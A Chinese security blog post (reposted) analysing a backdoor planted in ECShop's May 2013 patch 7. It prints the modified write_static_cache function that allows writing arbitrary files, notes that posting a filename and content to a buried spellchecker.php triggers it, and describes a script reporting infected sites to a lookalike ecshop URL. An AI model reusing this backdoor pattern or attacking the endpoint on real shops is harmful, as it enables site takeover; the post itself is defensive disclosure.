漏洞预警:ecshop 7号补丁再次出现隐蔽后门分析

  • A+
所属分类:Seay信息安全博客

显示不全请点击全屏阅读

我到官网去看了下,目前官网已经取消该补丁下载

 

ecshop被收购后,就不知道是怎么了

2013年5月7号更新的7号补丁,但是下载下来后,我发现明显不对。
第一,includes目录里面多了个install文件夹,原来是没有这个文件夹的,并且里面全是js(最后发现这个目录根本没用到,骇客大哥你做事情能仔细点不)
第二,admin/js目录里面全部js都上来了(后面通过文件比较发现只有一个文件有修改)

好了,我们要分析下这位骇客大哥干的“好事”。

首先,他修改了includes\lib_base.php文件的write_static_cache函数

把原来的:

 

function write_static_cache($cache_name, $caches)
{
    if ((DEBUG_MODE & 2) == 2)
    {
        return false;
    }
    $cache_file_path = ROOT_PATH . '/temp/static_caches/' . $cache_name . '.php';
    $content = "<?php\r\n";
    $content .= "\$data = " . var_export($caches, true) . ";\r\n";
    $content .= "?>";
    file_put_contents($cache_file_path, $content, LOCK_EX);
}

 

 


修改成了:

function write_static_cache($cache_name, $caches)
{
	if(empty($caches))
	{
		if ((DEBUG_MODE & 2) == 2)
		{
			return false;
		}
		$cache_file_path = ROOT_PATH . '/temp/static_caches/' . $cache_name . '.php';
		$content = "<?php\r\n";
		$content .= "\$data = " . var_export($caches, true) . ";\r\n";
		$content .= "?>";
		file_put_contents($cache_file_path, $content, LOCK_EX);
	}
	else
	{
		file_put_contents($newfile, $newname);
	}
}

 

很明显这个为了写文件,这位大哥的毛病又犯了,不知道大哥用的什么编辑器,修改后文件编码从utf-8变成了utf-8+
4


造成的后果是如果打了这个补丁的网站会出现:
5

代码调用的地方在:

文件位置:includes\fckeditor\editor\dialog\fck_spellerpages\spellerpages\server-scripts\spellchecker.php(这个文件够深)

7

这个样子后,你就可以随便弄个表单提交到spellchecker.php,提交一个文件名和内容就可以了。可以生成任何内容的文件。

大牛还整了个统计的,真是有心拉,在文件admin\js\common.js
6
把中招的网址发到 http://bbs.ecshop.com/forumdata/logs/install.php还故意用的bbs.ecshop.com来躲避嫌疑

这个补丁的问题我当天就发现了,但是最近一直比较忙没有公布出来,心想ecshop应该会发现吧,但是半个月过去了都没反应,我就抽空写了出来,
我想说的是ecshop肿么了!

 

摘自:http://www.lpboke.com/ecshop7%e5%8f%b7%e8%a1%a5%e4%b8%81%e5%86%8d%e6%ac%a1%e5%87%ba%e7%8e%b0%e5%90%8e%e9%97%a8.html

Tags:

ECshop漏洞,

如果您喜欢我的博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容: 也可以点击链接【订阅到鲜果】

如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡
漏洞预警:ecshop 7号补丁再次出现隐蔽后门分析